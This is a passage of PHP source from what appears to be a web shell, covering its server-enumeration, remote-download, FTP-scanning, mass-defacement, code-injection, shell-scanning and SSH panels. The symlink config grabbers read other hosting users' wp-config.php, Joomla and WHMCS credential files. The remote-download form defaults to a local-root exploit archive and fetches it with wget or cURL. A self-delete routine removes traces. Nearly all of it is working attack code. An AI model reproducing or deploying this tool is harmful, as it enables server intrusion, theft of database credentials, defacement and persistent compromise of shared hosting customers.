  1373.    <tr><td>Server Software : <font color=7171C6>".$_SERVER['SERVER_SOFTWARE']."</font></td</tr><tr>";
  1374.     if(function_exists('apache_get_modules'))
  1375.     {
  1376.     echo "<tr><td style='text-align:left;'>Loaded Apache modules : <br /><br /><font color=7171C6>";
  1377.         echo implode(', ', apache_get_modules());
  1378.         echo "</font></tr></td>";
  1379.     }
  1380.     if($os=='win')
  1381.     {
  1382.         echo  "<tr><td style='text-align:left;'>Account Setting : <font color=7171C6><pre>".cmd('net accounts')."</pre></td></tr>
  1383.               <tr><td style='text-align:left'>User Accounts : <font color=7171C6><pre>".cmd('net user')."</pre></td></tr>
  1384.               ";
  1385.     }
  1386.     if($os=='nix')
  1387.     {
  1388.         echo "<tr><td style='text-align:left'>Distro : <font color=7171C6><pre>".cmd('cat /etc/*-release')."</pre></font></td></tr>
  1389.              <tr><td style='text-align:left'>Distr name : <font color=7171C6><pre>".cmd('cat /etc/issue.net')."</pre></font></td></tr>
  1390.              <tr><td style='text-align:left'>GCC : <font color=7171C6><pre>".cmd('whereis gcc')."</pre></td></tr>
  1391.              <tr><td style='text-align:left'>PERL : <font color=7171C6><pre>".cmd('whereis perl')."</pre></td></tr>
  1392.              <tr><td style='text-align:left'>PYTHON : <font color=7171C6><pre>".cmd('whereis python')."</pre></td></tr>
  1393.              <tr><td style='text-align:left'>JAVA : <font color=7171C6><pre>".cmd('whereis java')."</pre></td></tr>
  1394.              <tr><td style='text-align:left'>APACHE : <font color=7171C6><pre>".cmd('whereis apache')."</pre></td></tr>
  1395.              <tr><td style='text-align:left;'>CPU : <br /><br /><pre><font color=7171C6>".cmd('cat /proc/cpuinfo')."</font></pre></td></tr>
  1396.              <tr><td style='text-align:left'>RAM : <font color=7171C6><pre>".cmd('free -m')."</pre></td></tr>
  1397.              <tr><td style='text-align:left'> User Limits : <br /><br /><font color=7171C6><pre>".cmd('ulimit -a')."</pre></td></tr>";
  1398.               $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  1399.               $uze=array();
  1400.               foreach($useful as $uzeful)
  1401.               {
  1402.                 if(cmd("which $uzeful"))
  1403.                 {
  1404.                     $uze[]=$uzeful;
  1405.                 }
  1406.               }
  1407.               echo "<tr><td style='text-align:left'>Useful : <br /><font color=7171C6><pre>";
  1408.               echo implode(', ',$uze);
  1409.               echo "</pre></td></tr>";
  1410.               $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  1411.               $uze=array();
  1412.               foreach($downloaders as $downloader)
  1413.               {
  1414.                 if(cmd("which $downloader"))
  1415.                 {
  1416.                     $uze[]=$downloader;
  1417.                 }
  1418.               }
  1419.               echo "<tr><td style='text-align:left'>Downloaders : <br /><font color=7171C6><pre>";
  1420.               echo implode(', ',$uze);
  1421.               echo "</pre></td></tr>";
  1422.               echo "<tr><td style='text-align:left'>Users : <br /><font color=7171C6><pre>".wordwrap(get_users())."</pre</font>></td></tr>
  1423.                    <tr><td style='text-align:left'>Hosts : <br /><font color=7171C6><pre>".cmd('cat /etc/hosts')."</pre></font></td></tr>";
  1424.     }
  1425.     echo "</table><br /><br /><hr /><br /><br />";
  1426. }
  1427.  
  1428. function remote_file_check_ui()
  1429. {
  1430.     echo "<div id=result><center><h2>Remote File Check</h2><hr /><br /><br />
  1431.          <table class=tbl><form method='POST'><tr><td>URL : <input size=50 name='rem_web' value='http://www.ajithkp560.hostei.com/php/'></td></tr>
  1432.          <tr><td><font color=red>Input File's Names in TextArea</font></tr></td><tr><td><textarea spellcheck='false' class='textarea_edit' cols=50 rows=30 name='tryzzz'>indrajith.php
  1433. ajithkp560.php
  1434. index.html
  1435. profile.php
  1436. c99.php
  1437. r57.php</textarea></td></tr>
  1438.         <tr><td><br /><input type='submit' value='   >>   ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />";
  1439. }
  1440.  
  1441. function remote_file_check_bg()
  1442. {
  1443.     set_time_limit(0);
  1444.     $rtr=array();
  1445.     echo "<div id=result><center><h2>Scanner Report</h2><hr /><br /><br /><table class=tbl>";
  1446.     $webz=$_POST['rem_web'];
  1447.     $uri_in=$_POST['tryzzz'];
  1448.     $r_xuri = trim($uri_in);
  1449.     $r_xuri=explode("\n", $r_xuri);
  1450.     foreach($r_xuri as $rty)
  1451.     {
  1452.         $urlzzx=$webz.$rty;
  1453.         if(function_exists('curl_init'))
  1454.         {
  1455.             echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
  1456.             $ch = curl_init($urlzzx);
  1457.             curl_setopt($ch, CURLOPT_NOBODY, true);
  1458.             curl_exec($ch);
  1459.             $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  1460.             curl_close($ch);
  1461.             if($status_code==200)
  1462.             {
  1463.                 echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
  1464.             }
  1465.             else
  1466.             {
  1467.                 echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
  1468.             }
  1469.         }
  1470.         else
  1471.         {
  1472.             echo "<font color=red>cURL Not Found </font>";
  1473.             break;
  1474.         }
  1475.     }
  1476.     echo "</table><br /><br /><hr /><br /><br /></div>";
  1477. }
  1478.  
  1479. function remote_download_ui()
  1480. {
  1481.     echo "<div id=result><center><h2>Remote File Download</h2><hr /><br /><br /><table class=tbl><form method='GET'><input type=hidden name='path' value=".getcwd()."><tr><td><select style='color:green; background-color:black; border:1px solid #666;' name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr>
  1482.    <tr><td>URL <input size=50 name='rurlfile' value='ajithkp560.hostei.com/localroot/2.6.x/h00lyshit.zip'></td></tr>
  1483.    <tr><td><input type='submit' class='input_big' value='   >>   ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
  1484. }
  1485.  
  1486. function remote_download_bg()
  1487. {
  1488.     chdir($_GET['path']);
  1489.     global $os;
  1490.     $opt=$_GET['type_r_down'];
  1491.     $rt_ffile=$_GET['rurlfile'];
  1492.     $name=basename($rt_ffile);
  1493.     echo "<div id=result>";
  1494.     switch($opt)
  1495.     {
  1496.         case "WGET":
  1497.             if($os!='win')
  1498.             {
  1499.                 cmd("wget $rt_ffile");
  1500.                 alert("Downloaded Successfully...");
  1501.             }
  1502.             else
  1503.             {
  1504.                 alert("Its Windows OS... WGET is not available");
  1505.             }
  1506.             break;
  1507.         case "cURL":
  1508.             if(function_exists('curl_init'))
  1509.             {
  1510.                 $ch = curl_init($rt_ffile);
  1511.                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1512.                 $data = curl_exec($ch);
  1513.                 curl_close($ch);
  1514.                 file_put_contents($name, $data);
  1515.                 alert("Download succeeded");
  1516.             }
  1517.             else
  1518.             {
  1519.                 alert("cURL Not Available");
  1520.             }
  1521.             break;
  1522.     }
  1523.     echo "</div>";
  1524. }
  1525.  
  1526. function hex_encode_ui()
  1527. {
  1528.     if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx']))
  1529.     {
  1530.         $tyx=$_POST['tyxxx'];
  1531.         $rezultzz=$_POST['hexinp'];
  1532.         switch($tyx)
  1533.         {
  1534.             case "Encode":
  1535.                 $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz);
  1536.                 echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1537.                <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
  1538.                <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1539.                Input : <input name='hexinp' size=50 value='input here'><input type=submit value='   >>  ' /><br /><br /><hr /><br /><br /></div>";
  1540.                 break;
  1541.             case "Decode":
  1542.                 $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz);
  1543.                 echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1544.                <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
  1545.                <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1546.                Input : <input name='hexinp' size=50 value='input here'><input type=submit value='   >>  ' /><br /><br /><hr /><br /><br /></div>";
  1547.                 break;
  1548.         }
  1549.     }
  1550.     else
  1551.     {
  1552.         echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1553.        <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>Here visible Your Result</textarea>
  1554.        <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1555.        Input : <input name='hexinp' size=50 value='input here'><input type=submit value='   >>  ' /><br /><br /><hr /><br /><br /></div>";
  1556.     }
  1557. }
  1558.  
  1559. function killme()
  1560. {
  1561.     global $self;
  1562.     echo "<div id=result><center><h2>Good Bye Dear</h2><hr />Dear, Good by... :( Hope You Like me...<br /><br /><br/><hr /><br /><br />";
  1563.     $me=basename($self);
  1564.     unlink($me);
  1565. }
  1566.  
  1567. function ftp_anonymous_ui()
  1568. {
  1569.     echo "<div id='result'><center><h2>Anonymous FTP Scanner</h2><hr /></center><table class=tbl><form method='GET'><tr><td><textarea name='ftp_anonz' cols=40 rows=25 class='textarea_edit'>127.0.0.1
  1570. ftp.google.com
  1571. ftp.r00t.com
  1572. ftp.ajithkp.org
  1573. ...
  1574. ...</textarea></td></tr><tr><td><input class='input_big' type='submit' value='   >>   ' /></td></tr></form></table><br /><br /><hr /><br /><br />";
  1575. }
  1576.  
  1577. function ftp_anonymous_bg()
  1578. {
  1579.     echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=table>";
  1580.     $ftp_list=$_GET['ftp_anonz'];
  1581.     $xftpl = trim($ftp_list);
  1582.     $xftpl = explode("\n", $xftpl);
  1583.     foreach($xftpl as $xftp)
  1584.     {
  1585.         $xftp = str_replace("ftp://", "", $xftp);
  1586.         $conn_ftp = ftp_connect($xftp);
  1587.         $success = ftp_login($conn_ftp, "anonymous", "");
  1588.         if($success)
  1589.         {
  1590.             echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=green>Successfull</font></td></tr>";
  1591.         }
  1592.         else
  1593.         {
  1594.             echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=red>Failed</font></td></tr>";
  1595.         }
  1596.        
  1597.     }
  1598.     echo "</table><br /><br /><hr /><br /><br />";
  1599. }
  1600.  
  1601. function mass_deface_ui()
  1602. {
  1603.     echo "<div id=result><center><h2>Mass Deface</h2><hr /><br /><br /><table class=tbl><form method='GET'><input name='mm_path' type='hidden' value=".$_GET['path']."><tr><td>Name : <input size=40 name='mass_name'></td></tr>
  1604.    <tr><td><textarea name='mass_cont' cols=80 rows=25 class='textarea_edit'></textarea></td></tr><tr><td><input class='input_big' type=submit value='   >>   ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
  1605. }
  1606.  
  1607. function mass_deface_bg()
  1608. {
  1609.     global $sep;
  1610.     $d_path=$_GET['mm_path'];
  1611.     chdir($d_path);
  1612.     $d_file=$_GET['mass_name'];
  1613.     $d_conten=$_GET['mass_cont'];
  1614.     if(is_dir($d_path))
  1615.     {
  1616.         chdir($d_path);
  1617.         $d_dirs=array();
  1618.         if($handle=opendir($d_path))
  1619.         {
  1620.             while(($item=readdir($handle))!==FALSE)
  1621.             {
  1622.                 if($item=="."){continue;}
  1623.                 if($item==".."){continue;}
  1624.                 if(is_dir($item))
  1625.                 {
  1626.                     array_push($d_dirs, $item);
  1627.                 }
  1628.             }
  1629.         }
  1630.     }
  1631.     echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=tbl>";
  1632.     foreach($d_dirs as $d_dir)
  1633.     {
  1634.         $xd_path=getcwd()."$sep$d_dir$sep$d_file";
  1635.         if(is_writable($d_dir))
  1636.         {
  1637.             $handle=fopen($xd_path, "wb");
  1638.             if($handle)
  1639.             {
  1640.                 fwrite($handle, $d_conten);
  1641.             }
  1642.         }
  1643.         echo "<tr><td><font color=green>$xd_path</font></td></tr>";
  1644.     }
  1645.     echo "</table><br /><br /><hr /><br /><br /></div>";
  1646. }
  1647.  
  1648.  
  1649. function symlinkg($usernamexx,$domainxx)
  1650. {
  1651.         symlink('/home/'.$usernamexx.'/public_html/vb/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin1.txt');
  1652.         symlink('/home/'.$usernamexx.'/public_html/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin2.txt');
  1653.         symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin3.txt');
  1654.         symlink('/home/'.$usernamexx.'/public_html/cc/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin4.txt');
  1655.         symlink('/home/'.$usernamexx.'/public_html/inc/config.php','Indrajith/'.$domainxx.' =>mybb.txt');
  1656.         symlink('/home/'.$usernamexx.'/public_html/config.php','Indrajith/'.$domainxx.' =>Phpbb1.txt');
  1657.         symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>Phpbb2.txt');
  1658.         symlink('/home/'.$usernamexx.'/public_html/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress1.txt');
  1659.         symlink('/home/'.$usernamexx.'/public_html/blog/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress2.txt');
  1660.         symlink('/home/'.$usernamexx.'/public_html/configuration.php','Indrajith/'.$domainxx.' =>Joomla1.txt');
  1661.         symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php','Indrajith/'.$domainxx.' =>Joomla2.txt');
  1662.         symlink('/home/'.$usernamexx.'/public_html/joomla/configuration.php','Indrajith/'.$domainxx.' =>Joomla3.txt');
  1663.         symlink('/home/'.$usernamexx.'/public_html/whm/configuration.php','Indrajith/'.$domainxx.' =>Whm1.txt');
  1664.         symlink('/home/'.$usernamexx.'/public_html/whmc/configuration.php','Indrajith/'.$domainxx.' =>Whm2.txt');
  1665.         symlink('/home/'.$usernamexx.'/public_html/support/configuration.php','Indrajith/'.$domainxx.' =>Whm3.txt');
  1666.         symlink('/home/'.$usernamexx.'/public_html/client/configuration.php','Indrajith/'.$domainxx.' =>Whm4.txt');
  1667.         symlink('/home/'.$usernamexx.'/public_html/billings/configuration.php','Indrajith/'.$domainxx.' =>Whm5.txt');
  1668.         symlink('/home/'.$usernamexx.'/public_html/billing/configuration.php','Indrajith/'.$domainxx.' =>Whm6.txt');
  1669.         symlink('/home/'.$usernamexx.'/public_html/clients/configuration.php','Indrajith/'.$domainxx.' =>Whm7.txt');
  1670.         symlink('/home/'.$usernamexx.'/public_html/whmcs/configuration.php','Indrajith/'.$domainxx.' =>Whm8.txt');
  1671.         symlink('/home/'.$usernamexx.'/public_html/order/configuration.php','Indrajith/'.$domainxx.' =>Whm9.txt');
  1672.         symlink('/home/'.$usernamexx.'/public_html/admin/conf.php','Indrajith/'.$domainxx.' =>5.txt');
  1673.         symlink('/home/'.$usernamexx.'/public_html/admin/config.php','Indrajith/'.$domainxx.' =>4.txt');
  1674.         symlink('/home/'.$usernamexx.'/public_html/conf_global.php','Indrajith/'.$domainxx.' =>invisio.txt');
  1675.         symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>7.txt');
  1676.         symlink('/home/'.$usernamexx.'/public_html/connect.php','Indrajith/'.$domainxx.' =>8.txt');
  1677.         symlink('/home/'.$usernamexx.'/public_html/mk_conf.php','Indrajith/'.$domainxx.' =>mk-portale1.txt');
  1678.         symlink('/home/'.$usernamexx.'/public_html/include/config.php','Indrajith/'.$domainxx.' =>12.txt');
  1679.         symlink('/home/'.$usernamexx.'/public_html/settings.php','Indrajith/'.$domainxx.' =>Smf.txt');
  1680.         symlink('/home/'.$usernamexx.'/public_html/includes/functions.php','Indrajith/'.$domainxx.' =>phpbb3.txt');
  1681.         symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>infinity.txt');
  1682. }
  1683.  
  1684. function config_grabber_bg()
  1685. {
  1686.     global $sym_htaccess,$sym_php_ini;
  1687.     mkdir('INDRAJITH', 0777);
  1688.     symlink("/", "INDRAJITH/root");
  1689.     $htaccess=fopen('INDRAJITH/.htaccess', 'wb');
  1690.     fwrite($htaccess,$sym_htaccess);
  1691.     $php_ini_x=fopen('INDRAJITH/php.ini', 'wb');
  1692.     fwrite($php_ini_x, $sym_php_ini);
  1693.     $usr=explode("\n",$_POST['user_z_list']);
  1694.     foreach($usr as $uzer)
  1695.     {
  1696.         $u_er=trim($uzer);
  1697.         symlinggg($u_er);
  1698.     }
  1699.     echo "<script>window.open('INDRAJITH/', '_blank');</script>";
  1700.     alert('Config Grab compted. Check configs in direcory INDRAJITH');
  1701. }
  1702.  
  1703. if(isset($_POST['user_z_list']))
  1704. {
  1705.     config_grabber_bg();
  1706. }
  1707.  
  1708.  
  1709. function config_grabber_ui()
  1710. {
  1711.     if(file('/etc/passwd'))
  1712.     {
  1713.         ?><script>alert("/etc/named.conf Not Found, Its alternative method.");</script><div id=result><center><h2>Config Grabber</h2><hr /><br /><br /><table class=tbl><form method=POST><tr><td><textarea spellcheck=false class='textarea_edit' rows=15 cols=60  name=user_z_list><?php
  1714.         $users = file('/etc/passwd');
  1715.         foreach($users as $user)
  1716.         {
  1717.             $user = explode(':', $user);
  1718.             echo $user[0]."\n";
  1719.         }
  1720.         ?></textarea></td></tr><tr><td><input type='submit' class='input_big' value='   >>   '/></td></tr></form></table><br /><br /><hr /><br /><br /><hr /></div><?php
  1721.     }
  1722.     else
  1723.     {
  1724.         alert(" File Not Found : /etc/passwd ");
  1725.     }
  1726. }
  1727.  
  1728. function symlinggg($user)
  1729. {
  1730.     symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php', "INDRAJITH/".$user." =>blog/configuration.php");
  1731.     symlink('/home/'.$user.'/public_html/forum/includes/config.php', "INDRAJITH/".$user." =>forum/includes/config.php");
  1732.     symlink("/home/".$user."/public_html/wp-config.php", "INDRAJITH/".$user." =>wp-config.php");
  1733.     symlink("/home/".$user."/public_html/wordpress/wp-config.php", "INDRAJITH/".$user." =>wordpress/wp-config.php");
  1734.     symlink("/home/".$user."/public_html/configuration.php", "INDRAJITH/".$user." =>configuration.php");
  1735.     symlink("/home/".$user."/public_html/blog/wp-config.php", "INDRAJITH/".$user." =>blog/wp-config.php");
  1736.     symlink("/home/".$user."/public_html/joomla/configuration.php", "INDRAJITH/".$user." =>joomla/configuration.php");
  1737.     symlink("/home/".$user."/public_html/vb/includes/config.php", "INDRAJITH/".$user." =>vb/includes/config.php");
  1738.     symlink("/home/".$user."/public_html/includes/config.php", "INDRAJITH/".$user." =>includes/config.php");
  1739.     symlink("/home/".$user."/public_html/conf_global.php", "INDRAJITH/".$user." =>conf_global.php");
  1740.     symlink("/home/".$user."/public_html/inc/config.php", "INDRAJITH/".$user." =>inc/config.php");
  1741.     symlink("/home/".$user."/public_html/config.php", "INDRAJITH/".$user." =>config.php");
  1742.     symlink("/home/".$user."/public_html/Settings.php", "INDRAJITH/".$user." =>/Settings.php");
  1743.     symlink("/home/".$user."/public_html/sites/default/settings.php", "INDRAJITH/".$user." =>sites/default/settings.php");
  1744.     symlink("/home/".$user."/public_html/whm/configuration.php", "INDRAJITH/".$user." =>whm/configuration.php");
  1745.     symlink("/home/".$user."/public_html/whmcs/configuration.php", "INDRAJITH/".$user." =>whmcs/configuration.php");
  1746.     symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
  1747.     symlink("/home/".$user."/public_html/whmc/WHM/configuration.php", "INDRAJITH/".$user." =>whmc/WHM/configuration.php");
  1748.     symlink("/home/".$user."/public_html/whm/WHMCS/configuration.php", "INDRAJITH/".$user." =>whm/WHMCS/configuration.php");
  1749.     symlink("/home/".$user."/public_html/whm/whmcs/configuration.php", "INDRAJITH/".$user." =>whm/whmcs/configuration.php");
  1750.     symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
  1751.     symlink("/home/".$user."/public_html/clients/configuration.php", "INDRAJITH/".$user." =>clients/configuration.php");
  1752.     symlink("/home/".$user."/public_html/client/configuration.php", "INDRAJITH/".$user." =>client/configuration.php");
  1753.     symlink("/home/".$user."/public_html/clientes/configuration.php", "INDRAJITH/".$user." =>clientes/configuration.php");
  1754.     symlink("/home/".$user."/public_html/cliente/configuration.php", "INDRAJITH/".$user." =>cliente/configuration.php");
  1755.     symlink("/home/".$user."/public_html/clientsupport/configuration.php", "INDRAJITH/".$user." =>clientsupport/configuration.php");
  1756.     symlink("/home/".$user."/public_html/billing/configuration.php", "INDRAJITH/".$user." =>billing/configuration.php");
  1757.     symlink("/home/".$user."/public_html/admin/config.php", "INDRAJITH/".$user." =>admin/config.php");
  1758. }
  1759.  
  1760. function sym_xxx()
  1761. {
  1762.     global $sym_htaccess,$sym_php_ini;
  1763.     mkdir('Indrajith', 0777);
  1764.     symlink("/", "Indrajith/root");
  1765.     $htaccess=@fopen('Indrajith/.htaccess', 'w');
  1766.     fwrite($htaccess,$sym_htaccess);
  1767.     $php_ini_x=fopen('Indrajith/php.ini', 'w');
  1768.     fwrite($php_ini_x, $sym_php_ini);
  1769.     $akps = implode(file("/etc/named.conf"));
  1770.     if(!$akps)
  1771.     {
  1772.         config_grabber_ui();
  1773.     }
  1774.     else
  1775.     {
  1776.     $usrd = array();
  1777.     foreach($akps as $akp)
  1778.     {
  1779.         if(eregi("zone", $akp))
  1780.         {
  1781.             preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  1782.             flush();
  1783.             if(strlen(trim($akpzz[1][0]))>2)
  1784.             {
  1785.                 $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
  1786.                 symlinkg($akpzz[1][0],$user['name']);
  1787.                 flush();
  1788.             }
  1789.         }
  1790.     }
  1791.     }
  1792. }
  1793.  
  1794. function sym_link()
  1795. {
  1796.     global $sym_htaccess,$sym_php_ini;
  1797.     cmd('rm -rf AKP');
  1798.     mkdir('AKP', 0755);
  1799.     $usrd = array();
  1800.     $akps = implode(file("/etc/named.conf"));
  1801.     $htaccess=fopen('AKP/.htaccess', 'w');
  1802.     fwrite($htaccess,$sym_htaccess);
  1803.     $php_ini_x=fopen('AKP/php.ini', 'w');
  1804.     fwrite($php_ini_x, $sym_php_ini);
  1805.     symlink("/", "AKP/root");
  1806.     if(!$file)
  1807.     {
  1808.         echo "<script>alert('Bind File /etc/passwd Not Found. Its alternative Method')</script>";
  1809.         echo "<div id=result><center><h2>SymLink</h2></center><hr /><br /><br /><table class='table'><tr><th>Users</th><th>Exploit</th></tr>";
  1810.         $users = file('/etc/passwd');
  1811.         foreach($users as $user)
  1812.         {
  1813.             $user = explode(':', $user);
  1814.             echo "<tr><td>".$user[0]."</td><td><a href='AKP/root/home/".$user[0]."/public_html/' target=_blank>SymLink</tr>";
  1815.         }
  1816.         echo "</table><br /><br /><hr /><br /><br /></div>";
  1817.        
  1818.     }
  1819.     else
  1820.     {
  1821.         echo "<table class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
  1822.         foreach($akps as $akp)
  1823.         {
  1824.             if(eregi("zone", $akp))
  1825.             {
  1826.                 preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  1827.                 flush();
  1828.                 if(strlen(trim($akpzz[1][0]))>2)
  1829.                 {
  1830.                     $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
  1831.                     echo "<tr><td><a href=http://www.".$akpzz[1][0]." target=_blank>".$akpzz[1][0]."</a><td>".$user['name']."</td><td><a href='AKP/root/home/".$user['name']."/public_html/' target=_blank>SymLink</a></td></tr></table>";
  1832.                     flush();
  1833.                 }
  1834.             }
  1835.         }
  1836.     }
  1837. }
  1838.  
  1839. function shell_finder_ui()
  1840. {
  1841.     echo "<div id=result><center><h2>SH3LL SCANNER</h2><hr /><br /><br /><br /><form method='GET'>URL : <input size=50 name='sh311_scanx' value='http://www.ajithkp560.hostei.com/PHP/'><input type='submit' value='   >>  ' /></form><br /><br /><hr /><br /><br />";
  1842. }
  1843.  
  1844. function shell_finder_bg()
  1845. {
  1846.     $sh_url=$_GET['sh311_scanx'];
  1847.     echo "<div id=result><center><h2>SHELL SCAN</h2><hr /><br /><br /><table class='table'>";
  1848.     $ShellZ=array("indrajith.php", "c99.php", "c100.php","r57.php", "b374k.php", "c22.php", "sym.php", "symlink_sa.php", "r00t.php", "webr00t.php", "sql.php","cpanel.php", "wso.php", "404.php", "aarya.php", "greenshell.php", "ddos.php", "madspot.php", "1337.php", "31337.php", "WSO.php", "dz.php", "cpn.php", "sh3ll.php", "mysql.php", "killer.php", "cgishell.pl", "dz0.php", "whcms.php", "vb.php", "gaza.php", "d0mains.php", "changeall.php", "h4x0r.php", "L3b.php", "uploads.php", "shell.asp", "cmd.asp", "sh3ll.asp", "b374k-2.2.php", "m1n1.php", "b374km1n1.php");
  1849.     foreach($ShellZ as $shell)
  1850.     {
  1851.         $urlzzx=$sh_url.$shell;
  1852.         if(function_exists('curl_init'))
  1853.         {
  1854.             echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
  1855.             $ch = curl_init($urlzzx);
  1856.             curl_setopt($ch, CURLOPT_NOBODY, true);
  1857.             curl_exec($ch);
  1858.             $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  1859.             curl_close($ch);
  1860.             if($status_code==200)
  1861.             {
  1862.                 echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
  1863.             }
  1864.             else
  1865.             {
  1866.                 echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
  1867.             }
  1868.         }
  1869.         else
  1870.         {
  1871.             echo "<font color=red>cURL Not Found </font>";
  1872.             break;
  1873.         }
  1874.     }
  1875.     echo "</table><br /><br /><hr /><br /><br /></div>";
  1876. }
  1877.  
  1878. function code_in_ui()
  1879. {
  1880.     global $sep;
  1881.     $mode=$_POST['modexxx'];
  1882.     $ftype=$_POST['ffttype'];
  1883.     $c_cont=$_POST['code_cont'];
  1884.     $ppp=$_POST['path'];
  1885.     if(isset($_POST['modexxx']) && isset($_POST['path']) && isset($_POST['ffttype']) && isset($_POST['code_cont']) && $mode!="" && $ftype!="" && $c_cont!="" && $ppp!="")
  1886.     {
  1887.         echo "<div id=result><center><h2>Successfully c0d3 inj3cted</h2></center><table class=tbl>";
  1888.         switch($mode)
  1889.         {
  1890.             case "Apender":
  1891.                 $mmode="a";
  1892.                 break;
  1893.             case "Rewrite":
  1894.                 $mmode="w";
  1895.                 break;
  1896.         }
  1897.         if($handle = opendir($ppp))
  1898.         {
  1899.             while(($c_file = readdir($handle)) !== False)
  1900.             {
  1901.                 if((preg_match("/$ftype".'$'.'/', $c_file , $matches) != 0) && (preg_match('/'.$c_file.'$/', $self , $matches) != 1))
  1902.                 {
  1903.                     echo "<tr><td><font color=red>$ppp$sep$c_file</font></td></tr>";
  1904.                     $fd = fopen($ppp.$sep.$c_file,$mmode);
  1905.                     if($fd)
  1906.                     {
  1907.                         fwrite($fd,$c_cont);
  1908.                     }
  1909.                     else
  1910.                     {
  1911.                         alert("Error. Access Denied");
  1912.                     }
  1913.                 }
  1914.             }
  1915.         }
  1916.         echo "</table><br /><br /><hr /><br /><br /></div>";
  1917.     }
  1918.     else
  1919.     {
  1920.     ?>
  1921.         <div id=result><center><h2>c0de inj3ct</h2></center><hr /><br /><br /><table class=table><form method='POST'><input type='hidden' name='path' value="<?php echo getcwd(); ?>"><tr><td>Mode : </td>
  1922.         <td><select style='color:green; background-color:black; border:1px solid #666;' name='modexxx'><option>Apender</option><option>Rewrite</option></select></td></tr><tr><td>File Type</td><td><input name='ffttype' value='.php' size=50></td></tr>
  1923.         <tr><td>Content : </td><td><textarea name='code_cont' rows=20 cols=60 class='textarea_edit'></textarea></td></tr><tr><td></td><td><input type=submit value='   >>   ' class='input_big' /></td></tr></form></table><br /><br /><hr /><br /><br />
  1924.     <?php
  1925.     }
  1926. }
  1927.  
  1928. function ssh_man_ui()
  1929. {
  1930.     ?>
  1931.     <div id=result><center><h2>SSH Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ssh_host'></td></tr><tr><td>Username : </td><td><input size=50 name='ssh_user'></td></tr><tr><td>Password : </td><td><input size=50 name='ssh_pass'></td></tr><tr><td></td><td><input type='submit' value='   >>   ' /></form></table></center><br /><br /><hr /><br /><br /></div>
  1932.     <?php
  1933. }
  1934.  
  1935. function ssh_man_bg()
  1936. {
  1937.     $ssh_h=$_GET['ssh_host'];
  1938.     $ssh_u=$_GET['ssh_user'];
  1939.     $ssh_p=$_GET['ssh_pass'];
  1940.     if(!function_exists('ssh2_connect'))
  1941.     {
  1942.         alert("Sorry, Function ssh2_connect is not found");
  1943.     }
  1944.     $conn=ssh2_connect($ssh_h, 22);
  1945.     if(!$conn)
  1946.     {
  1947.         alert("SSH Host Not Found");
  1948.     }
  1949.     $log=ssh2_auth_password($conn, $ssh_u, $ssh_p);
  1950.     if(!$log)
  1951.     {
  1952.         alert("SSH Authorication failed");
  1953.     }
  1954.     $shell=ssh2_shell($conn, "bash");
  1955.     if($_GET['ssh_cmd']!="" && $_GET['ssh_cmd'])
  1956.     {
  1957.         $ssh_cmd=$_GET['ssh_cmd'];
  1958.         fwrite($shell, $ssh_cmd);
  1959.         sleep(1);
  1960.         while($line=fgets($shell))
  1961.         {
  1962.             flush();
